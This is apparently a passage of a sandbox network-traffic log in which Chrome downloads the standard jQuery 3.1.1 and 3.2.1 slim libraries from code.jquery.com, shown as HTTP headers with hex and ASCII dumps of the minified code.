                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:04 UTC613INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 86709
                                                                                                                                                    Server: nginx
                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                    ETag: "28feccc0-152b5"
                                                                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Age: 2505997
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:04 GMT
                                                                                                                                                    X-Served-By: cache-lga21947-LGA, cache-ewr-kewr1740078-EWR
                                                                                                                                                    X-Cache: HIT, HIT
                                                                                                                                                    X-Cache-Hits: 4188, 0
                                                                                                                                                    X-Timer: S1736326385.619998,VS0,VE1
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77
                                                                                                                                                    Data Ascii: /*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 3e 3d 30 26 26 63 3c 62 3f 5b 74 68 69 73 5b 63 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 68 2c 73 6f 72 74 3a 63 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 63 2e 73 70 6c 69 63 65 7d 2c 72 2e 65 78 74 65 6e 64 3d 72 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 68 3d 31 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6a 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 67 26 26 28 6a 3d 67 2c 67 3d 61 72 67 75 6d 65 6e 74 73
                                                                                                                                                    Data Ascii: >=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject||this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 6e 20 61 2e 6e 6f 64 65 4e 61 6d 65 26 26 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 30 3b 69 66 28 77 28 61 29 29 7b 66 6f 72 28 63 3d 61 2e 6c 65 6e 67 74 68 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 64 20 69 6e 20 61 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 61 7d 2c 74 72 69 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 22 22 3a 28 61 2b 22 22 29 2e
                                                                                                                                                    Data Ascii: n a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 61 72 72 61 79 22 3d 3d 3d 63 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 62 3e 30 26 26 62 2d 31 20 69 6e 20 61 29 7d 76 61 72 20 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 70 2c 71 2c 72 2c 73 2c 74 2c 75 3d 22 73 69 7a 7a 6c 65 22 2b 31 2a 6e 65 77 20 44 61 74 65 2c 76 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 77 3d 30 2c 78 3d 30 2c 79 3d 68 61 28 29 2c 7a 3d 68 61 28 29 2c 41 3d 68 61 28 29 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 6c 3d 21 30 29 2c 30 7d 2c 43 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 44 3d 5b 5d 2c 45 3d 44 2e 70 6f 70 2c 46 3d 44 2e
                                                                                                                                                    Data Ascii: array"===c||0===b||"number"==typeof b&&b>0&&b-1 in a)}var x=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ha(),z=ha(),A=ha(),B=function(a,b){return a===b&&(l=!0),0},C={}.hasOwnProperty,D=[],E=D.pop,F=D.
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 70 28 22 5e 22 2b 4b 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 4b 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 57 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 58 3d 2f 5e 68 5c 64 24 2f 69 2c 59 3d 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 5a 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 24 3d 2f 5b 2b 7e 5d 2f 2c 5f 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 28 5b 5c 5c 64 61
                                                                                                                                                    Data Ascii: p("^"+K+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+K+"*((?:-\\d)?\\d*)"+K+"*\\)|)(?=[^-]|$)","i")},W=/^(?:input|select|textarea|button)$/i,X=/^h\d$/i,Y=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,$=/[+~]/,_=new RegExp("\\\\([\\da
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 5b 33 5d 29 26 26 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 72 65 74 75 72 6e 20 47 2e 61 70 70 6c 79 28 64 2c 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 66 29 29 2c 64 7d 69 66 28 63 2e 71 73 61 26 26 21 41 5b 61 2b 22 20 22 5d 26 26 28 21 71 7c 7c 21 71 2e 74 65 73 74 28 61 29 29 29 7b 69 66 28 31 21 3d 3d 77 29 73 3d 62 2c 72 3d 61 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 28 6b 3d 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 6b 3d 6b 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3a 62 2e 73 65 74
                                                                                                                                                    Data Ascii: [3])&&c.getElementsByClassName&&b.getElementsByClassName)return G.apply(d,b.getElementsByClassName(f)),d}if(c.qsa&&!A[a+" "]&&(!q||!q.test(a))){if(1!==w)s=b,r=a;else if("object"!==b.nodeName.toLowerCase()){(k=b.getAttribute("id"))?k=k.replace(ba,ca):b.set
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 61 7c 7c 62 2e 69 73 44 69 73 61 62 6c 65 64 21 3d 3d 21 61 26 26 65 61 28 62 29 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 22 6c 61 62 65 6c 22 69 6e 20 62 26 26 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 61 28 61 29 7b 72 65 74 75 72 6e 20 69 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 3d 2b 62 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 2c 66 3d 61 28 5b 5d 2c 63 2e 6c 65 6e 67 74 68 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 63 5b 65 3d 66 5b 67 5d 5d 26 26 28 63 5b 65 5d 3d 21 28 64 5b 65
                                                                                                                                                    Data Ascii: e.disabled===a:b.disabled===a:b.isDisabled===a||b.isDisabled!==!a&&ea(b)===a:b.disabled===a:"label"in b&&b.disabled===a}}function pa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 63 26 26 63 2e 76 61 6c 75 65 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 2c 64 2c 65 2c 66 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 69 66 28 66 29 7b 69 66 28 63 3d 66 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 2c 63 26 26 63 2e 76 61 6c 75 65
                                                                                                                                                    Data Ascii: n function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c,d,e,f=b.getElementById(a);if(f){if(c=f.getAttributeNode("id"),c&&c.value
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 6f 70 74 69 6f 6e 2f 3e 3c 2f 73 65 6c 65 63 74 3e 22 3b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4b 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 61 2e 71 75 65 72 79 53
                                                                                                                                                    Data Ascii: bled='disabled'></a><select disabled='disabled'><option/></select>";var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+K+"*[*^$|!~]?="),2!==a.queryS
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 44 6f 63 75 6d 65 6e 74 3d 3d 3d 76 26 26 74 28 76 2c 62 29 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3a 34 26 64 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 63 2c 64 3d 30 2c 65 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6c 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e
                                                                                                                                                    Data Ascii: Document===v&&t(v,b)?1:k?I(k,a)-I(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e||!f)return a===n?-1:b===n?1:e?-1:f?1:k?I(k,a)-I(k,b):0;if(e===f)return la(a,b);c=a;while(c=c.parentNode)g.un


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    11192.168.2.449755151.101.2.1374433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:04 UTC363OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                                                                                                                                                    Host: code.jquery.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:04 UTC611INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 69597
                                                                                                                                                    Server: nginx
                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                    ETag: "28feccc0-10fdd"
                                                                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Age: 843788
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:04 GMT
                                                                                                                                                    X-Served-By: cache-lga21984-LGA, cache-ewr-kewr1740045-EWR
                                                                                                                                                    X-Cache: HIT, HIT
                                                                                                                                                    X-Cache-Hits: 507, 0
                                                                                                                                                    X-Timer: S1736326385.636757,VS0,VE0
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                                                                                                                    Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 5b 61 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 72 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 62 2c 63 2c 62 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61
                                                                                                                                                    Data Ascii: [a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushSta
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6b 2e 63 61 6c 6c 28 61 29 29 26 26 28 21 28 62 3d 65 28 61 29 29 7c 7c 28 63 3d 6c 2e 63 61 6c 6c 28 62 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 26 26 6d 2e 63 61 6c 6c 28 63 29 3d 3d 3d 6e 29 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 66 6f 72 28 62 20 69 6e 20 61 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 61 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                                                                                                                    Data Ascii: ject Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typ
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6f 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 72 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 63 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 72 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6a 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b 22 5d 22 5d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65
                                                                                                                                                    Data Ascii: now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"le
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 4c 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 4c 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4e 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4b 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4b 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4b
                                                                                                                                                    Data Ascii: ")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L+"|[*])"),ATTR:new RegExp("^"+M),PSEUDO:new RegExp("^"+N),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+K+"*(even|odd|(([+-]|)(\\d*)n|)"+K+"*(?:([+-]|)"+K+"*(\\d+)|))"+K
                                                                                                                                                    2025-01-08 08:53:04 UTC1378INData Raw: 3d 3d 77 26 26 31 31 21 3d 3d 77 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 77 26 26 28 6c 3d 5a 2e 65 78 65 63 28 61 29 29 29 69 66 28 66 3d 6c 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 77 29 7b 69 66 28 21 28 6a 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68 28 6a 29 2c 64 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6a 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 26 26 74 28 62 2c 6a 29 26 26 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68
                                                                                                                                                    Data Ascii: ==w&&11!==w)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==w&&(l=Z.exec(a)))if(f=l[1]){if(9===w){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(s&&(j=s.getElementById(f))&&t(b,j)&&j.id===f)return d.push
